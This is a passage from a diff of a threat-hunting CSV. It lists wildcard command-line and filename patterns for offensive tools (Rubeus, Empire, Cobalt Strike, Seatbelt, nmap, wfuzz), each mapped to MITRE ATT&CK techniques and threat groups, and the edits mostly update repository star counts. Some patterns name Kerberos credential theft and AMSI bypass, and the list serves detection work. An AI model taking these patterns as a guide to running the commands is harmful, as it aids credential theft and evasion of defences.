Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -AgentJitter *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentJitter *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* --am-si-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"* asktgs * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgs /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktgt /user *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* asktht /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* asm.py -t * -ln -w resources/*.txt -o *","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" "* asn-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* asreproast *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* --asreproast *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of 